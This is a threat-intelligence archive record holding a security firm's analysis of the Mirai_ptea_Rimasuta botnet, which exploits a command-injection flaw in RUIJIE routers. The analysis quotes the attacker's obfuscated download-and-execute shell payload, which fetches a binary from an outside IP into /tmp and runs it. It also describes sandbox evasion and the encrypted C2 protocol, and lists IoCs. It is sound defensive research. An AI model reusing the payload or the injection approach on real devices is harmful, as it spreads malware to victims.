{
	"id": "d80dfb8e-ba4e-4668-9b7f-6adddd895348",
	"created_at": "2026-04-06T00:15:04.630167Z",
	"updated_at": "2026-04-10T03:30:57.164332Z",
	"deleted_at": null,
	"sha1_hash": "fb91003d4911dcb2f5c455bb67a818945936ec12",
	"title": "Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0 day to spread",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 854647,
	"plain_text": "Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0\r\nday to spread\r\nBy Hui Wang\r\nPublished: 2021-09-28 · Archived: 2026-04-05 15:06:41 UTC\r\nOverview\r\nIn July 2021 we blogged about Mirai_ptea, a botnet spreading through an undisclosed vulnerability in KGUARD\r\nDVR. At first we thought it was a short-lived botnet that would soon disappear so we just gave it a generic name.\r\nBut clearly we underestimated the group behind this family, which has in fact been very active and was recently\r\nobserved to be spreading using a 0day vulnerability in the RUIJIE NBR700 series routers.\r\nIt is interesting to note that the author included this paragraph in one of the updated samples.\r\n-_- you guys didnt pick up on the name? really???? its ``RI-MA-SU-TA``. not MIRAI_PTEA this is dumb\r\nname.\r\nMirai_ptea_Rimasuta now has builtin mechanism to check if the running environment is a sandbox, it also\r\nencrypts the network traffic to counter the network level detection.\r\nTimeline\r\n2021-06-10 Note another mirai variant, mirai_aurora, first exploited this RUIJIE vulnerability to spread\r\n2021-09-05 We noticed Mirai_ptea_Rimasuta starting to use exploit\r\n2021-09-06 We notified the vendor of the vulnerability\r\n2021-09-09 The vendor confirmed the existence of the vulnerability and informed that it has stopped\r\nmaintaining this version of the device, and the manufacturer believes that it can be mitigated by changing\r\nthe default password, so it does not intend to provide a new patch to fix the vulnerability.\r\nVulnerability Analysis\r\nVulnerability Type\r\nCommand injection vulnerability\r\nVulnerability details\r\nTo avoid abuse, we are not disclosing the full details. The description in this section includes only part of the\r\nvulnerability exploitation process.\r\nAn interface named wget_test.asp test exists on the RUJIE router device, which accepts URLs passed in from\r\nthe page for wget testing (the testing function is eventually implemented through a script named wget_test.sh ),\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 1 of 14\n\nbut it does not perform special character checks on the incoming parameters, leading to command injection. Note:\r\nThe interface requires login authentication. However, the RUIJIE router has default weak password, so an attacker\r\ncan combine these 2 factors to launch an attack.\r\nAccording to our investigation, there are still great number of online devices having this problem.\r\nwhere wget_test.sh reads as follows:\r\n#!/bin/sh\r\nwhile [ 1 ]\r\ndo\r\nwget -O /dev/null $1;\r\nsleep 1;\r\ndone\r\nKnown affected device versions\r\nNBR1600GDX9 Release(180516)\r\nRGNBR700GDX5 Release(180202)\r\nRGNBR700GDX5 Release(180314)\r\nRGNBR700GDX9 Release(180720)\r\nRGNBR700GWDX5 Release(180314)\r\nRGNBR700GWDX9 Release(180613)\r\nRGNBR700GWDX9 Release(180720)\r\nRGNBR700GWDX9 Release(191023)\r\nRGNBR900GA1C2 Release(170809)\r\nExploit payload analysis\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 2 of 14\n\nSome of the vulnerabilities exploit Payload as follows:\r\nThe content of the file corresponding to the URL in the above image is shown below. At first glance, it looks a bit\r\nstrange because it uses many empty variables( to confuse security analysts?)\r\nv=.rib;\r\ncd ${ENrjHs}/t${hSQGxia}mp;\r\nwg${qyZuBCTFDSMnw}et http://2[.56.244.121/gkTHLPZAAsmP -O ${v};\r\nchm${mBSVmBhyrCQcZ}od +x ${v};\r\n./${v};\r\nWhen these variables are removed, its function is intuitive: download the sample and execute it.\r\nv=.rib;\r\ncd /tmp;\r\nwget http://2.56.244.121/gkTHLPZAAsmP -O ${v};\r\nchmod +x ${v};\r\n./${v};\r\nBotnet size\r\nFrom our data horizon, the active Bot source IP trends for this botnet are as follows:\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 3 of 14\n\nBot source IPs are geographically distributed as follows:\r\nSample Analysis\r\nThe basic information of the ARM sample is shown as follows.\r\nMD5:b01b0bc32469f11a47d6e54eef8c7ffb\r\nELF 32-bit LSB executable, ARM, version 1, statically linked, stripped\r\nPacker:No\r\nLib:uclibc\r\nMirai_ptea_Rimasuta is a Mirai variant, with redesigned encryption algorithm and C2 communication protocol. In\r\nterms of encryption algorithm, Mirai_ptea_Rimasuta uses TEA algorithm instead of Mirai's simple XOR\r\nencryption, and a lot of sensitive resource information such as C2, Tor Proxy, etc have been encrypted; in terms of\r\nC2 communication, Mirai_ptea_Rimasuta uses Tor Proxy to indirectly establish communication with C2. For\r\nmore details on this part, please refer to our previous Blog, and let’s just look at some changes in this active new\r\nsample.\r\n0x1: TEA key\r\nThis Mirai_ptea_Rimasuta sample hardcod 2 sets of TEA keys, one for encrypting \u0026 decrypting sensitive\r\nresources and one for encrypting \u0026 decrypting network traffic, to distinguish the former we call it Res_teakey and\r\nthe latter Net_teakey.\r\nRes_teakey is shown as follows.\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 4 of 14\n\nPart of the resource information is decrypted as shown below, note the content of index c. This WEek on NeTLAb\r\n360 bOTnet oPERATOR lEaRNS CHacha SliDe\r\nindex 0, value = /proc/\r\nindex 1, value = /exe\r\nindex 2, value = /fd\r\nindex 3, value = /proc/net/tcp\r\nindex 4, value = /cmdline\r\nindex 5, value = /status\r\nindex 6, value = /maps\r\nindex 7, value = /dev\r\nindex 8, value = /dev/misc\r\nindex 9, value = /dev/misc/watchdog\r\nindex a, value = /dev/watchdog\r\nindex b, value = watchdog\r\nindex c, value = This WEek on NeTLAb 360 bOTnet oPERATOR lEaRNS CHacha SliDe\r\n(as far as we know, none of us know how to dance chacha…yet…)\r\nNet_teakey is shown below\r\nIt is not used in practice, it just acts as a placeholder and Mirai_ptea_Rimasuta dynamically generates a new\r\nNet_teakey at runtime, which will be discussed in the Network Protocols section below.\r\n0x2: Sandbox detection\r\nA large number of sandboxes or simulators process samples in a fixed path and name them with MD5 or random\r\nstrings. Mirai_ptea_Rimasuta takes this cue and checks the path \u0026 filename of the sample, and only after it meets\r\nthe requirements will it go ahead and run, otherwise it exits.\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 5 of 14\n\nThe following shows legit \"run paths\"\r\n./.rib\r\n/XXriXX\r\n0x3: C2 variation\r\nMirai_ptea_Rimasuta uses the following code snippet to get the Tor C2, which shows that the C2 table entry in the\r\nencrypted resource is 0xD, and there are 6 C2s (random mod 6).\r\nThe encrypted information in 0xD is decrypted as follows.\r\nindex d, value = uf7ejrtdd6vvrsobk6rtsuicwogqyf6g72s55qop2kvpt7r4wfui6fqdwrabajewouypwxdsq4rxn7heb3k53ihoogik46\r\nAfter excluding the \".onion\" at the end of the above string and splitting it by length 56, then splicing it with the\r\n.onion string at the end, we get the following 6 C2s, which have a one-to-one correspondence with the port of the\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 6 of 14\n\nhard-coded 6 in the sample.\r\nuf7ejrtdd6vvrsobk6rtsuicwogqyf6g72s55qop2kvpt7r4wfui6fqd.onion:20346\r\nwrabajewouypwxdsq4rxn7heb3k53ihoogik46ji6o7gj65yeo33reqd.onion:32288\r\nt5pmcdgiipaznhuexh2usvojfixqzudnizgzeyihsyu7e5rehj7bfkad.onion:17774\r\nrg7t465nvnnzugdbdqdg3yf2pypssynb4wxavgghb4me2lecnw23ivyd.onion:6000\r\nvmdm5jrmksizpt6f7trsno6od7xcfs6hzywah46eaju72jkfvqbqdcqd.onion:27644\r\npnjc66nasxdomwlyqo32d4ft43pooo7s4yuom3gn2gr5bmcpw7lgq4qd.onion:4409\r\n0x4: Network protocol change\r\nThe active Mirai_ptea_Rimasuta sample also starts to encrypt the network traffic using the TEA algorithm, and\r\nalthough there is a hard-coded set of keys Net_teakey in the sample, it is not used in practice, but a new key\r\ndynamically generated through negotiation with the C2s.\r\nThe whole communication process can be divided into 3 steps as follows\r\nStage 1. communication with C2 is established via TOR PROXY\r\nStage 2. TEA key negotiation\r\nStage 3. receive the command from C2, note that the traffic is encrypted at this time\r\nThe focus is on the key negotiation in the second step, we will take the actual data traffic generated in the\r\nfollowing figure as an example, and we will discuss step by step how Bot \u0026 C2 get the same key.\r\nStage1 is the typical process of establishing communication with TOR C2. Starting from Stage2,\r\nMirai_ptea_Rimasuta's packets consist of 3 parts: head(2bytes), hash(4bytes), and content(Nbytes) , where\r\nthe value of head is fixed in a session and the value of hash is calculated by the hash_calc function for content in\r\nthe appendix.\r\nThe whole negotiation process is shown as follows.\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 7 of 14\n\n1. Bot randomly generates 12 characters and uses the hash_calc algorithm in the appendix to get the value of\r\nNet_teakey[0]. At this time Bot has Net_teakey[0], C2 does not know the value of task Net_teakey.\r\n2. Bot randomizes 8 characters to form content, uses hash_calc to calculate content to get hash, and puts the\r\nlow 16 bits of the hash value into head, then sends this packet of 14 bytes long to C2, and finally calculates\r\nthe whole packet by hash_calc to get Net_teakey[2] value, at this time Bot has Net_teakey[0,2] and C2 has\r\nNet_teakey[2].\r\n3. C2 returns the packet to Bot, and the value of the hash is used in step\r\n4. After receiving the packet back from C2, Bot forms the content with local IP, random characters in step 1,\r\nencrypts it using TEA algorithm (Res_teakey is the key), constructs a packet of 32 bytes in length and\r\nsends it to C2, where the value of hash is Net_teakey[1], and finally calculates the C2 hash from step 3\r\nwith its own Bot hash is calculated by hash_calc, to be Net_teakey[3]. At this point, Bot already knows the\r\n4 values in Net_teakey, and the order of acquisition is [0,2,1,3].\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 8 of 14\n\n5. After C2 receives Bot's packet, it first gets Net_teakey[1], then gets Net_teakey[3] by hash_calc, and\r\nfinally decrypts content to get the 12 strings used by Bot in step 1, and then gets Net_teakey[0] by\r\nhash_calc. At this point, C2 also knows the 4 values in Net_teakey, which are obtained in the order of\r\n[2,1,3,0].\r\nAt this point, the negotiation process ends, and the subsequent communication between Bot \u0026 C2 uses the TEA\r\nalgorithm to encrypt \u0026 decrypt the key for Net_teakey.\r\n0x5: Information gathering function\r\nThis active Mirai_ptea_Rimasuta sample monitors the TCP network connections of the compromised device and\r\nuploads the connection details that meet specific requirements to the Reporter. we believe that the authors of\r\nMirai_ptea_Rimasuta will rely on this part of its collected information for his own data mining.\r\nThe specific implementation process can be divided into the following steps.\r\n1. Get the inode information of the current TCP network connection via /proc/net/tcp, as well as the state\r\nState information of the network connection\r\n2. Get the socket inode from /proc/[pid]/fd, match it with the inode in step 1, and get the corresponding\r\nprocess.\r\n3. Get the cmdline information of the process in step 2 from /proc/[pid]/cmdline\r\n4. If the state of the network connection is \"established\" and there is a \"wget\" string in the cmdline, the\r\ncmdline of the process and the remote address \u0026 port of the network communication will be reported to the\r\nReporter.\r\n5. If the State of the network connection is \"listen\" and the local port is one of \"3451,8888,17872,9137\", and\r\na process has established a connection with this process, the cmdline of this process and the remote address\r\n\u0026 port of the network communication will be reported to Reporter.\r\n6. If the state of the network connection is neither \"established\" nor \"listen\", the cmdline of the process and\r\nthe remote address \u0026 port of the network communication will be reported to Reporter.\r\nThe following code snippet is used to establish communication with the Reporter, where the Reporter decrypted\r\nthe contents and get gmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion .\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 9 of 14\n\nAfter successfully establishing communication with the Reporter, the message to be reported is constructed with\r\nthe following code snippet.\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 10 of 14\n\nThe actual Report packet generated, and the meaning of the fields, is shown below.\r\nRAW packet\r\n00000000: 5A A5 90 D9 F9 37 B4 D6 00 AC 1E 01 09 3A 77 67 Z....7.......:wg\r\n00000010: 65 74 20 2D 71 20 2D 4F 20 2D 20 68 74 74 70 3A et -q -O - http:\r\n00000020: 2F 2F 69 63 6D 70 2E 64 76 72 69 6E 73 69 64 65 //icmp.dvrinside\r\n00000030: 2E 63 6F 6D 3A 39 30 30 30 2F 47 65 74 50 75 62 .com:9000/GetPub\r\n00000040: 6C 69 63 4E 61 6D 65 20 licName\r\n----------------------------------------------------------------------------\r\nField parsing\r\n5A A5 ----\u003e magic, 2bytes\r\n90 D9 F9 37 ----\u003e remote ip, 4 bytes\r\nB4 D6 ----\u003e remote port, 2 bytes\r\n00 ----\u003e hardcode, 1 byte\r\nAC 1E 01 09 ----\u003e local ip\r\n3A ----\u003e length of \"cmdline\"\r\n77 67 ..to end ----\u003e cmdline\r\nRecommendation\r\nWe recommend RUIJIE router users to check and update the firmware system in time. Set a complex login\r\npassword for the Web management interface.\r\nSuggestions\r\nWe recommend that users check and update their device firmwares in a timely manner, and check whether there\r\nare default accounts that should be disabled.\r\nWe recommend the following IoCs to be monitored and blocked on the networks where it is applicable.\r\nReaders are always welcomed to reach us on Twitter or email us to netlab at 360 dot cn.\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 11 of 14\n\nIoC\r\nDownloader\r\nhttp://2[.56.244.121/tuPuSSbAxXIW\r\nhttp://2[.56.244.121/gkTHLPZAAsmP\r\nhttp://2[.56.244.121/VqIXrFxAGpPD\r\nhttp://2[.56.244.157/qSdYKoxbZakW\r\nhttp://2[.56.244.157/iZXPWXshhRRt\r\nhttp://2[.56.244.157/vnlWcwcBunwk\r\nhttp://2[.56.244.157/IAqecfTrQwQF\r\nhttp://2[.56.244.157/bwgFHtUOGJcv\r\nhttp://2[.56.244.121/KaoJHwKMBiAJ\r\nhttp://2[.56.244.157/yhZyIAclbmhD\r\nhttp://2[.56.244.157/PszBtRNfnzBO\r\nhttp://2[.56.244.157/SywXQrWdNIrM\r\nhttp://2[.56.244.157/awfLWTOmgxTX\r\nhttp://2[.56.244.157/zEkFejmPQeVR\r\nhttp://91[.211.91.56/mIoCinspKSkE\r\nhttp://91[.211.89.242/vkvTxquhFCGV\r\nhttp://91[.211.88.220/OOGRLHgUnshR\r\nSample MD5\r\nb01b0bc32469f11a47d6e54eef8c7ffb\r\n1a5329dcda994df16e6896f870f04f5e\r\n344df0446b8b40588ca5e72ad3ef7217\r\n777792d3df3f1850fa667b4afbb2cfc1\r\na6ddfec272fbf867a4cf3c154eaf47aa\r\n904cbd20a5996125f91f9c7c02ca9bbd\r\nC2\r\nuf7ejrtdd6vvrsobk6rtsuicwogqyf6g72s55qop2kvpt7r4wfui6fqd.onion:20346\r\nwrabajewouypwxdsq4rxn7heb3k53ihoogik46ji6o7gj65yeo33reqd.onion:32288\r\nt5pmcdgiipaznhuexh2usvojfixqzudnizgzeyihsyu7e5rehj7bfkad.onion:17774\r\nrg7t465nvnnzugdbdqdg3yf2pypssynb4wxavgghb4me2lecnw23ivyd.onion:6000\r\nvmdm5jrmksizpt6f7trsno6od7xcfs6hzywah46eaju72jkfvqbqdcqd.onion:27644\r\npnjc66nasxdomwlyqo32d4ft43pooo7s4yuom3gn2gr5bmcpw7lgq4qd.onion:4409\r\nReporter\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 12 of 14\n\ngmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion:6667\r\ngmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion:6668\r\ngmfj55g3lvkik3d73euirhjnicny3x32azifmtboqojsglnnifulbzqd.onion:6669\r\nAppendix\r\n----------------------------------------------------------------------\r\nRAW packet\r\n#00000048 99 9f 29 9c 9f 99 72 53 4b 7f e9 08 7c 9b ..)...rS K...|.\r\n# head 99 9f\r\n# hash 29 9c 9f 99\r\n# content 72 53 4b 7f e9 08 7c 9b\r\n----------------------------------------------------------------------\r\ndef hash_calc(buf,len):\r\n cnt=len\u003e\u003e2\r\n cnt2=len\u00263\r\n sum=len\r\n \r\n for i in range(0,cnt*4,4):\r\n tmp=((ord(buf[i+1])\u003c\u003c8)+ord(buf[i])+sum)\r\n tmp2=(tmp^(((ord(buf[i+3])\u003c\u003c8)+ord(buf[i+2]))\u003c\u003c11)\u00260xffffffff)^((tmp\u003c\u003c16)\u00260xffffffff)\r\n sum=(tmp2+(tmp2\u003e\u003e11))\u00260xffffffff\r\n \r\n if cnt2==3:\r\n tmp=((ord(buf[cnt*4+1])\u003c\u003c8) +ord(buf[cnt*4])+sum)\u00260xffffffff\r\n tmp2=tmp^((ord(buf[cnt*4+2])\u003c\u003c18)\u00260xffffffff)^((tmp\u003c\u003c16)\u00260xffffffff)\r\n sum=(tmp2+(tmp2\u003e\u003e11))\u00260xffffffff\r\n \r\n elif cnt2==2:\r\n tmp=((ord(buf[cnt*4+1])\u003c\u003c8) +ord(buf[cnt*4])+sum)\u00260xffffffff\r\n sum=(tmp^(tmp\u003c\u003c11)\u00260xffffffff)+((tmp^(tmp\u003c\u003c11)\u00260xffffffff)\u003e\u003e17)\r\n \r\n elif cnt2==1:\r\n tmp=(((ord(buf[cnt*4])+sum)\u003c\u003c10)\u00260xffffffff)^ (ord(buf[cnt*4])+sum)\r\n sum=(tmp+(tmp\u003e\u003e1))\u00260xffffffff\r\n \r\n else:\r\n pass\r\n \r\n tmp3=(sum^(sum*8)\u00260xffffffff)+((sum^(8*sum)\u00260xffffffff)\u003e\u003e5)\r\n tmp4=(tmp3^(16*tmp3)\u00260xffffffff)+((tmp3^(16*tmp3)\u00260xffffffff)\u003e\u003e17)\r\n final=(tmp4^(tmp4\u003c\u003c25)\u00260xffffffff)+((tmp4^(tmp4\u003c\u003c25)\u00260xffffffff)\u003e\u003e6)\r\n return final\u00260xffffffff\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 13 of 14\n\ncontent='''\r\n72 53 4b 7f e9 08 7c 9b\r\n'''.replace(' ', '').replace('\\n','').decode('hex')\r\nprint hex(hash_calc(content,len(content)))\r\nSource: https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nhttps://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/"
	],
	"report_names": [
		"rimasuta-spread-with-ruijie-0day-en"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434504,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb91003d4911dcb2f5c455bb67a818945936ec12.pdf",
		"text": "https://archive.orkl.eu/fb91003d4911dcb2f5c455bb67a818945936ec12.txt",
		"img": "https://archive.orkl.eu/fb91003d4911dcb2f5c455bb67a818945936ec12.jpg"
	}
}